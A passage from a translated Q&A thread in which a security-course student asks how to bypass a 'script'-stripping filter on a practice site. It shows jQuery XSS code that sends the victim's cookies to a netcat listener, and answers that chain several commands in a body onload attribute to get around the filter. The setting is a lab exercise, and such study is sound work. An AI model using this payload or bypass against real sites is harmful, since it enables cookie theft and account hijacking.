这是来自网络安全实践问题。
该站点(为此目的而设置)试图通过使用以下代码过滤'script'标签来防止XSS:
filtered = re.sub(r"(?i)script", "", input)
该任务是在受害者的浏览器中执行有效负载,该负载将执行某些操作,包括将其cookie发送到远程netcat连接。 (当网站未过滤“脚本”时,我已经完成了此操作)。
我已经对此进行了研究,发现我可以通过执行以下查询来执行单个javascript命令:
"<body onload=alert(\"hello\");>"
但是,这不能解决我的问题,因为它只能执行一个命令(我相信)。我需要执行的有效负载包含多个命令。
我还尝试使用HTML字符代码来避免使用过滤器,例如:
"<script>..."
但是过滤器捕获了它。
这里是我正在使用的代码库:
<html>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
function payload(attacker) {
function log(data) {
$.get(attacker, data);
}
function proxy(href) {
$("html").load(href, function(){
//Send cookie to remote connection
log(document.cookie);
});
}
proxy("./");
}
function makeLink(xssdefense, target, attacker) {
if (xssdefense == 0) {
//Code to execute when there is no filter
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">");
}
else {
//Code to execute when 'script' is filtered
return target + "./search?xssdefemse=" + xssdefense.toString() + "&q=" +
encodeURIComponent("<body onload=alert(\"test\");>");
}
}
var xssdefense = 1;
var target = "http://81.211.34.1/xsstest";
var attacker = "http://127.0.0.1:31337/";
$(function() {
var url = makeLink(xssdefense, target, attacker);
$("h3").html("<a id=\"link\" target=\"run\" href=\"" + url + "\"> Enter Site!<\a>");
document.getElementById("link").click();
});
</script> <h3></h3>
</html>
任何帮助将不胜感激!
onload=
属性中只能有一个表达式,但是您仍然可以执行多个命令。
<body onload="(function() { cmd1(); cmd2(); cmd3(); })();">
这定义了一个执行三个命令的函数表达式,然后被调用(最后是()
。
<body onload="cmd1(), cmd2(), cmd3();">
或者,如果您知道它们都返回假值(如不返回任何内容,例如undefined
)
<body onload="cmd1() || cmd2() || cmd3();">
相反,如果您知道它们都返回真实值(如数字,字符串或对象)
<body onload="cmd1() && cmd2() && cmd3();">
您可以在onload
中有多个表达式:
<body onload="alert(1); alert(2);">
您终于找到解决方案了吗?我被要求在网络安全课程中进行类似的项目。